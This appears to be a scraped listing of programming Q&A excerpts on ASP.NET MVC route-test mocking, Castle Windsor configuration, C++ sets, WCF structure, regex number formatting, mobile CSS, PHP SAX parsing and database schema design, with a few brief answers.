    Hi, This was working in MVC 1, but has broken in MVC 2. I'm mocking the HttpContext so I can test routes. The code was originally taken from Steven Sanderson's book. I've tried mocking some extra properties as suggested in this comment but it hasn't fixed it. What am I missing? This is the start of my test code. routeData is null when this code completes. // Arange RouteCollection routeConfig = new RouteCollection(); MvcApplication.RegisterRoutes(routeConfig); var mockHttpContext = makeMockHttpContext(url); // Act RouteData routeData = routeConfig.GetRouteData(mockHttpContext.Object); This method creates my mock HttpContext: private static Mock<HttpContextBase> makeMockHttpContext(String url) { var mockHttpContext = new Mock<System.Web.HttpContextBase>(); // Mock the request var mockRequest = new Mock<HttpRequestBase>(); mockHttpContext.Setup(t => t.Request).Returns(mockRequest.Object); mockRequest.Setup(t => t.AppRelativeCurrentExecutionFilePath).Returns(url); // Tried adding these to fix in MVC2 (didn't work) mockRequest.Setup(r => r.HttpMethod).Returns("GET"); mockRequest.Setup(r => r.Headers).Returns(new NameValueCollection()); mockRequest.Setup(r => r.Form).Returns(new NameValueCollection()); mockRequest.Setup(r => r.QueryString).Returns(new NameValueCollection()); mockRequest.Setup(r => r.Files).Returns(new Mock<HttpFileCollectionBase>().Object); // Mock the response var mockResponse = new Mock<HttpResponseBase>(); mockHttpContext.Setup(t => t.Response).Returns(mockResponse.Object); mockResponse.Setup(t => t.ApplyAppPathModifier(It.IsAny<String>())).Returns<String>(t => t); return mockHttpContext; }
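    One setup that MVC 2 routing reads but MVC 1 did not (as far as I recall; treat this as a guess to verify) is Request.PathInfo. If it is left un-mocked it returns null and GetRouteData() gives up. Adding this line to makeMockHttpContext() is the first thing I would try:

        // Hedged suggestion: MVC 2's route matching reads PathInfo, so return an empty string rather than null.
        mockRequest.Setup(r => r.PathInfo).Returns(string.Empty);

    This also assumes the url values passed in are app-relative ("~/controller/action"), which is the form AppRelativeCurrentExecutionFilePath is expected to return.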

    Read the article

  • Could not find schema information for the element 'castle'.

    - by Richard77
    Hello! I'm creating a Custom tag in my web.config. I first wrote the following entry under the configSections section. <section name="castle" type="Castle.Windsor.Configuration.AppDomain.CastleSectionHandler, Castle.Windsor" /> But, when I try to create a castle node inside the configuration node as below <castle> <components> </components> </castle> I get the following error message:"*Could not find schema information for the element 'castle*'." "*Could not find schema information for the element 'components'***." Am I missing something? I can't find why. And, if I run the application anyway, I get the following error "Could not find section 'Castle' in the configuration file associated with this domain." Ps.// The sample comes from "Pro ASP.NET MVC Framework"/Steven Sanderson/APress ISBN-13 (pbk): 978-1-4302-1007-8" on page 99. Thank you for the help ============================================================ Since I believe to have done exactly what's said in the book and did not succed, I ask the same question in different terms. How do I add a new node using the above information? ============================================================================= Thank you. I did what you said and do not have the two warnings. However, I've go a big new warning: "The element 'configuration' in namespace 'MyWindsorSchema' has invalid child element 'configSections' in namespace 'MyWindsorSchema'. List of possible elements expected: 'include, properties, facilities, components' in namespace 'MyWindsorSchema'."
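    The two "Could not find schema information" messages are normally just Visual Studio's XML validation noting that no XSD is registered for the custom section; they do not stop the configuration from working. The runtime error is the one to chase: configuration section names are case-sensitive, so the code must ask for "castle" exactly as it is named in configSections. A hedged sketch of the container wiring, based on the Castle Windsor API of that era (verify the namespaces against your version):

        using Castle.Core.Resource;
        using Castle.Windsor;
        using Castle.Windsor.Configuration.Interpreters;

        // "castle" must match <section name="castle" .../> exactly, including case.
        IWindsorContainer container =
            new WindsorContainer(new XmlInterpreter(new ConfigResource("castle")));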

    Read the article

  • C++ Set Erase Entry Question

    - by Wallace
    Hi. I encountered a problem here. I'm using C++ multiset. This is the test file. Score: 3-1 Ben Steven Score: 1-0 Ben Score: 0-0 Score: 1-1 Cole Score: 1-2 Ben I'm using while loop and ifstream (fin1) to read in from the test file above. multiset<string, less<string> > myset; while(!fin1.eof()) { fin1 >> scoreName; if(scoreName == "Score:") { //calculates number of matches played } else { goalCheck = scoreName.substr(1,1); if(goalCheck == "-") { string lGoal, rGoal; lGoal = scoreName.substr(0,1); rGoal = scoreName.substr(2,1); int leftGoal, rightGoal; leftGoal = atoi(lGoal.c_str()); rightGoal = atoi(rGoal.c_str()); if(leftGoal > rightGoal) //if team wins { //some computations } else if(leftGoal < rightGoal) //if team loses { //computations } else if(leftGoal == rightGoal) //if team draws { //computations } else { myset.insert(myset.begin(), scoreName); } } } I'm inserting all names into myset (regardless of wins/loses/draws) in my last else statement. But I only require the names of those matches who won/draw. Those names whose matches lost will not be included in myset. In the test file above, there's only one match that lost (1-2) and I wanted to remove "Ben". How can I do that? I tried to use myset.erase(), but I'm not sure how to get it point to Ben and remove it from myset. Any help is much appreciated. Thanks.

    Read the article

  • c# (wcf) architecture file and directory structure (and instantiation)

    - by stevenrosscampbell
    Hello and thanks for any assistance. I have a WCF service that I'm trying to properly modularize. I'm interested in finding out if there is a better way of implementing the file and directory structure along with instantiation; is there a more appropriate way of abstraction that I may be missing? Is this the best approach, especially for performance and the ability to handle thousands of simultaneous requests? Currently I have the following structure: -Root\Service.cs public class Service : IService { public void CreateCustomer(Customer customer) { CustomerService customerService = new CustomerService(); customerService.Create(customer); } public void UpdateCustomer(Customer customer) { CustomerService customerService = new CustomerService(); customerService.Update(customer); } } -Root\Customer\CustomerService.cs public class CustomerService { public void Create(Customer customer) { //DO SOMETHING } public void Update(Customer customer) { //DO SOMETHING } public void Delete(int customerId) { //DO SOMETHING } public Customer Retrieve(int customerId) { //DO SOMETHING } } Note: I do not include the Customer object or the DataAccess libraries in this example as I am only concerned about the service. Please let me know what you think, whether you know a better way, or point me to a resource that could help out. Thanks kindly. Steven
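    One incremental improvement over new-ing CustomerService inside every operation is to depend on an interface and let it be supplied from outside, which keeps the per-entity modules swappable and testable. A sketch under the assumption that an IoC container (or a custom WCF IInstanceProvider, since WCF otherwise wants a parameterless constructor) creates the service:

        public interface ICustomerService
        {
            void Create(Customer customer);
            void Update(Customer customer);
        }

        public class Service : IService
        {
            private readonly ICustomerService customerService;

            // Supplied by the container / instance provider rather than constructed in each operation.
            public Service(ICustomerService customerService)
            {
                this.customerService = customerService;
            }

            public void CreateCustomer(Customer customer)
            {
                customerService.Create(customer);
            }

            public void UpdateCustomer(Customer customer)
            {
                customerService.Update(customer);
            }
        }

    For throughput, per-call instantiation of a stateless CustomerService is cheap; the usual bottlenecks are the data access behind it and the service's InstanceContextMode/ConcurrencyMode settings rather than the folder layout.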

    Read the article

  • Auto-converting numbers to comma-fied versions

    - by Jeff Atwood
    Given the following text /feeds/tag/remote-desktop 1320 17007 22449240 /feeds/tag/terminal-server 1328 15805 20989040 /foo/23211/test 1490 11341 16898090 Let's say we want to convert those numbers to their comma-fied forms, like so /feeds/tag/remote-desktop 1,320 17,007 22,449,240 /feeds/tag/terminal-server 1,328 15,805 20,989,040 /foo/23211/test 1,490 11,341 16,898,090 (don't worry about fixing the fixed-width ASCII spacing, that's a problem for another day) This is the best regex I could come up with; it's based on this JavaScript regex solution from Regex Ninja Steven Levithan: return Regex.Replace(s, @"\b(?<!\/)\d{4,}\b(?<!\/)", delegate(Match match) { string output = ""; string m = match.Value; int len = match.Length; for (int i = len - 1; i >= 0 ; i--) { output = m[i] + output; if ((len - i) % 3 == 0) output = "," + output; } if (output.StartsWith(",")) output = output.Substring(1, output.Length-1); return output; }); In a related question, there is a very clever number comma insertion regex proposed: text = Regex.Replace(text, @"(?<=\d)(?=(\d{3})+$)", ",") However this requires an end anchor $ which, as you can see, I don't have in the above text -- the numbers are "floating" in the rest of the text. I suspect there is a cleaner way to do this than my solution? After writing this, I just realized I could combine them, and put one Regex inside the other, like so: return Regex.Replace(s, @"\b(?<!\/)\d{4,}\b(?<!\/)", delegate(Match match) { return Regex.Replace(match.Value, @"(?<=\d)(?=(\d{3})+$)", ","); });
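    If nesting one Regex.Replace inside another feels heavy, the framework's own numeric formatting can do the comma insertion once the outer pattern has isolated the digit runs. A shorter body for the same delegate, assuming every matched run fits in a long and the invariant culture's "," group separator is what you want:

        using System.Globalization;
        using System.Text.RegularExpressions;

        // Same outer pattern as above; only the replacement logic changes.
        return Regex.Replace(s, @"\b(?<!\/)\d{4,}\b(?<!\/)",
            match => long.Parse(match.Value).ToString("N0", CultureInfo.InvariantCulture));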

    Read the article

  • Android Web App : Position:fixed broken?

    - by StevenGilligan
    Hi all, I'm in the process of developing a web application for mobiles. I went with a web application because it seemed like a win to develop one application that could also run on iPhone / Windows Mobile / Palm etc. I started testing today after a few days of doing concepts, ideas and designs, and what I wanted to do was have a menu that sticks to the bottom of the page, exactly like the menu at the bottom in this iPhone application screenshot: http://farm4.static.flickr.com/3094/2656904921_1c54e93b4f.jpg Using CSS, I thought it would be really easy to do this. Simply using position:fixed; bottom:0; would have done the trick, but I have found it doesn't behave the same on mobile browsers. I tried to split my page into 2 sections: one would be a scrollable div (for the content) and the other one would be the bottom menu. Scrollable divs also do not work on Android. I also tried using frames with no luck either. Does anyone know of any way to re-create a menu that would stick to the bottom of a page for mobile phones? Thank you, Steven

    Read the article

  • Great examples of self-paced labs and exercises

    - by Mayo
    It is probably a safe bet that many of us are what they call Tactile / Kinesthetic Learners meaning that we learn best when we are physically doing something as opposed to listening to an online tutorial or reading a book. My goal with this question is to derive a list of books or online resources that serve as superb examples of self-paced programming labs and exercises. For example, I was extremely impressed with the SportsStore exercise in Steven Sanderson's Pro ASP.NET MVC Framework. The exercise spanned multiple chapters and gradually introduced new topics. I was also impressed with the materials associated with the Windows Azure Boot Camp. The demos and lab materials, accessible through the website, allow us to practice and reinforce what we can read about in articles and books. Please list any examples you might have, one per submission, below. The question is language/platform agnostic. Suggestions can be generic or specific to a given technology (PHP, SQL Server, Azure, Flash, Objective C, etc.). I only ask that the answers pertain to labs and exercises that relate to programming. My hope is that the best answers will float to the top allowing developers to review the top answers and find another programming topic that can be learned through example.

    Read the article

  • Converter problem with XmlDataProvider

    - by Andrew
    Sorry for this, I've just started programming with wpf. I can't seem to figure out why the following xaml displays "System.Xml.XmlElement" instead of the actual xml node content. This is displayed 5 times in the listbox whenever I run it. Not sure where I'm going wrong... <Window x:Class="TestBinding.Window1" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" Title="Window1" Height="300" Width="300"> <Window.Resources> <XmlDataProvider x:Key="myXmlSource" XPath="/root"> <x:XData> <root xmlns=""> <name>Steve</name> <name>Arthur</name> <name>Sidney</name> <name>Billy</name> <name>Steven</name> </root> </x:XData> </XmlDataProvider> <DataTemplate x:Key="shmooga"> <TextBlock Text="{Binding}"/> </DataTemplate> </Window.Resources> <Grid> <ListBox ItemTemplate="{StaticResource shmooga}" ItemsSource="{Binding Source={StaticResource myXmlSource}, XPath=name}"> </ListBox> </Grid> </Window> Any help would be very much appreciated. Thanks!

    Read the article

  • paging helper asp.net mvc

    - by csetzkorn
    Hi, I have implemented a paging HTML helper (adapted from Steven Sanderson's book). This is the current code: public static string PageLinks(this HtmlHelper html, int currentPage, int totalPages, Func<int, string> pageUrl) { StringBuilder result = new StringBuilder(); for (int i = 1; i <= totalPages; i++) { TagBuilder tag = new TagBuilder("a"); tag.MergeAttribute("href", pageUrl(i)); tag.InnerHtml = i.ToString(); if (i == currentPage) tag.AddCssClass("selectedPage"); result.AppendLine(tag.ToString()); } return result.ToString(); } This produces a link to every page of my items. If there are many pages this can be a bit overwhelming. I am looking for a similar implementation which produces something less overwhelming: a shorter list of page links around the current page (in the example, 6 is the current page). I am sure someone must have implemented something similar before I have to re-implement the wheel. Thanks. Christian
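    One way to get the shortened form is to render a window of pages around the current page, with the first and last pages always shown and ellipses for the gaps. A sketch building on the same TagBuilder approach (the padding value and the &hellip; separators are arbitrary choices):

        using System;
        using System.Text;
        using System.Web.Mvc;

        public static class PagingHelpers
        {
            public static string PageLinks(this HtmlHelper html, int currentPage, int totalPages,
                                           Func<int, string> pageUrl, int padding = 2)
            {
                StringBuilder result = new StringBuilder();
                Action<int> append = i =>
                {
                    TagBuilder tag = new TagBuilder("a");
                    tag.MergeAttribute("href", pageUrl(i));
                    tag.InnerHtml = i.ToString();
                    if (i == currentPage) tag.AddCssClass("selectedPage");
                    result.AppendLine(tag.ToString());
                };

                int start = Math.Max(1, currentPage - padding);
                int end = Math.Min(totalPages, currentPage + padding);

                append(1);                                        // always link the first page
                if (start > 2) result.AppendLine("&hellip;");
                for (int i = Math.Max(2, start); i <= Math.Min(end, totalPages - 1); i++)
                    append(i);
                if (end < totalPages - 1) result.AppendLine("&hellip;");
                if (totalPages > 1) append(totalPages);           // always link the last page

                return result.ToString();
            }
        }

    With totalPages = 20 and currentPage = 6 this renders 1 … 4 5 6 7 8 … 20, which matches the shape described above.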

    Read the article

  • How to send array by post method

    - by GanChinHock.com
    Following is my sample form. <form METHOD="post" METHOD="post" ACTION="index.php" METHOD="post" METHOD="post" METHOD="post"> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="text" NAME="array[]" /> <input TYPE="submit" NAME="submit" VALUE="Submit" /> </form> Basically I have 10 inputs of array. Assume my domain is http://domain.com and the file above is index.php. I am trying to fill the form automatically by using the following method. http://domain.com/index.php?array[]=John&array[]=Kelly ... & array[]=Steven Unfortunately, it is not working. :(

    Read the article

  • Dependecy Injection with Massive ORM: dynamic trouble

    - by Sergi Papaseit
    I've started working on an MVC 3 project that needs data from an enormous existing database. My first idea was to go ahead and use EF 4.1 and create a bunch of POCO's to represent the tables I need, but I'm starting to think the mapping will get overly complicated as I only need some of the columns in some of the tables. (thanks to Steven for the clarification in the comments. So I thought I'd give Massive ORM a try. I normally use a Unit of Work implementation so I can keep everything nicely decoupled and can use Dependency Injection. This is part of what I have for Massive: public interface ISession { DynamicModel CreateTable<T>() where T : DynamicModel, new(); dynamic Single<T>(string where, params object[] args) where T : DynamicModel, new(); dynamic Single<T>(object key, string columns = "*") where T : DynamicModel, new(); // Some more methods supported by Massive here } And here's my implementation of the above interface: public class MassiveSession : ISession { public DynamicModel CreateTable<T>() where T : DynamicModel, new() { return new T(); } public dynamic Single<T>(string where, params object[] args) where T: DynamicModel, new() { var table = CreateTable<T>(); return table.Single(where, args); } public dynamic Single<T>(object key, string columns = "*") where T: DynamicModel, new() { var table = CreateTable<T>(); return table.Single(key, columns); } } The problem comes with the First(), Last() and FindBy() methods. Massive is based around a dynamic object called DynamicModel and doesn't define any of the above method; it handles them through a TryInvokeMethod() implementation overriden from DynamicObject instead: public override bool TryInvokeMember(InvokeMemberBinder binder, object[] args, out object result) { } I'm at a loss on how to "interface" those methods in my ISession. How could my ISession provide support for First(), Last() and FindBy()? Put it another way, how can I use all of Massive's capabilities and still be able to decouple my classes from data access?
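    Because DynamicModel resolves First(), Last() and FindBy() at runtime through TryInvokeMember, they cannot be expressed as ordinary interface members, but the session can still own table creation and hand back a dynamic reference so the runtime binder does the dispatch. A sketch of one way to keep the decoupling (the method and argument names used on the dynamic side are illustrative; check them against the Massive version in use):

        public interface ISession
        {
            // ...existing strongly-typed members...

            // Escape hatch for the dynamic-only surface (First, Last, FindBy, ...).
            dynamic Table<T>() where T : DynamicModel, new();
        }

        public class MassiveSession : ISession
        {
            public dynamic Table<T>() where T : DynamicModel, new()
            {
                return CreateTable<T>();
            }
        }

        // Usage: calls on a dynamic reference are routed through DynamicModel.TryInvokeMember at runtime.
        // dynamic products = session.Table<Product>();
        // var cheapest = products.First(OrderBy: "Price");

    Consumers still depend only on ISession, so the implementation can be swapped or mocked; what is lost is compile-time checking of the dynamic calls, which is inherent to Massive's design.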

    Read the article

  • how i can use SAX parser

    - by moustafa
    This is what the result should look like when i parse it through a SAX parser http://img13.imageshack.us/img13/6950/75914446.jpg This is the XML source code from which i need to generate the display: <orders> <order> <count>37</count> <price>49.99</price> <book> <isbn>0130897930</isbn> <title>Core Web Programming Second Edition</title> <authors> <count>2</count> <author>Marty Hall</author> <author>Larry Brown</author> </authors> </book> </order> <order> <count>1</count> <price>9.95</price> <yacht> <manufacturer>Luxury Yachts, Inc.</manufacturer> <model>M-1</model> <standardFeatures oars="plastic" lifeVests="none">false</standardFeatures> </yacht> </order> <order> <count>3</count> <price>22.22</price> <book> <isbn>B000059Z4H</isbn> <title>Harry Potter and the Order of the Phoenix</title> <authors> <count>1</count> <author>J.K. Rowling</author> </authors> </book> </order> i really have no clue how to code the functions but i have just set up the parser $xmlParser = xml_parser_create("UTF-8"); xml_parser_set_option($xmlParser, XML_OPTION_CASE_FOLDING, false); xml_set_element_handler($xmlParser, 'startElement', 'endElement'); xml_set_character_data_handler($xmlParser, 'HandleCharacterData'); $fileName = 'orders.xml'; if (!($fp = fopen($fileName, 'r'))){ die('Cannot open the XML file: ' . $fileName); } while ($data = fread($fp, 4096)){ $parsedOkay = xml_parse($xmlParser, $data, feof($fp)); if (!$parsedOkay){ print ("There was an error or the parser was finished."); break; } } xml_parser_free($xmlParser); function startElement($xmlParser, $name, $attribs) { } function endElement($parser, $name) { } function HandleCharacterData($parser, $data) { }

    Read the article

  • xml dom node children

    - by matt
    Need some help. I've got lots of code and I want to make it shorter; I know there's a way but I can't remember it. This is a code example: <?xml version="1.0" encoding="ISO-8859-1"?> <bookstore> <book category="cooking"> <title lang="en">Everyday Italian</title> <author>Giada De Laurentiis</author> <year>2005</year> <price>30.00</price> </book> <book category="children"> <title lang="en">Harry Potter</title> <author>J K. Rowling</author> <year>2005</year> <price>29.99</price> </book> <book category="web"> <title lang="en">XQuery Kick Start</title> <author>James McGovern</author> <author>Per Bothner</author> <author>Kurt Cagle</author> <author>James Linn</author> <author>Vaidyanathan Nagarajan</author> <year>2003</year> <price>49.99</price> </book> <book category="web" cover="paperback"> <title lang="en">Learning XML</title> <author>Erik T. Ray</author> <year>2003</year> <price>39.95</price> </book> </bookstore> As you can see there are different nodes and children; is there a way to make this code smaller so I don't have to keep writing the nodes and children?

    Read the article

  • problem with Using SAX parser

    - by moustafa
    Hi guys i have this small class task that im having trouble with. I need to create a PHP file using SAX to generate the display shown below from an XML file. Im not sure how to Use | to represent its level, where the root element orders is at level zero. This is what the result should look like when i parse it through a SAX parser http://img13.imageshack.us/img13/6950/75914446.jpg This is the XML source code from which i need to generate the display: <orders> <order> <count>37</count> <price>49.99</price> <book> <isbn>0130897930</isbn> <title>Core Web Programming Second Edition</title> <authors> <count>2</count> <author>Marty Hall</author> <author>Larry Brown</author> </authors> </book> </order> <order> <count>1</count> <price>9.95</price> <yacht> <manufacturer>Luxury Yachts, Inc.</manufacturer> <model>M-1</model> <standardFeatures oars="plastic" lifeVests="none">false</standardFeatures> </yacht> </order> <order> <count>3</count> <price>22.22</price> <book> <isbn>B000059Z4H</isbn> <title>Harry Potter and the Order of the Phoenix</title> <authors> <count>1</count> <author>J.K. Rowling</author> </authors> </book> </order>

    Read the article

  • Normalizing Item Names & Synonyms

    - by RabidFire
    Consider an e-commerce application with multiple stores. Each store owner can edit the item catalog of his store. My current database schema is as follows: item_names: id | name | description | picture | common(BOOL) items: id | item_name_id | picture | price | description | picture item_synonyms: id | item_name_id | name | error(BOOL) Notes: error indicates a wrong spelling (eg. "Ericson"). description and picture of the item_names table are "globals" that can optionally be overridden by "local" description and picture fields of the items table (in case the store owner wants to supply a different picture for an item). common helps separate unique item names ("Jimmy Joe's Cheese Pizza" from "Cheese Pizza") I think the bright side of this schema is: Optimized searching & Handling Synonyms: I can query the item_names & item_synonyms tables using name LIKE %QUERY% and obtain the list of item_name_ids that need to be joined with the items table. (Examples of synonyms: "Sony Ericsson", "Sony Ericson", "X10", "X 10") Autocompletion: Again, a simple query to the item_names table. I can avoid the usage of DISTINCT and it minimizes number of variations ("Sony Ericsson Xperia™ X10", "Sony Ericsson - Xperia X10", "Xperia X10, Sony Ericsson") The down side would be: Overhead: When inserting an item, I query item_names to see if this name already exists. If not, I create a new entry. When deleting an item, I count the number of entries with the same name. If this is the only item with that name, I delete the entry from the item_names table (just to keep things clean; accounts for possible erroneous submissions). And updating is the combination of both. Weird Item Names: Store owners sometimes use sentences like "Harry Potter 1, 2 Books + CDs + Magic Hat". There's something off about having so much overhead to accommodate cases like this. This would perhaps be the prime reason I'm tempted to go for a schema like this: items: id | name | picture | price | description | picture (... with item_names and item_synonyms as utility tables that I could query) Is there a better schema you would suggested? Should item names be normalized for autocomplete? Is this probably what Facebook does for "School", "City" entries? Is the first schema or the second better/optimal for search? Thanks in advance! References: (1) Is normalizing a person's name going too far?, (2) Avoiding DISTINCT

    Read the article

< Previous Page | 23 24 25 26 27 28 29  | Next Page >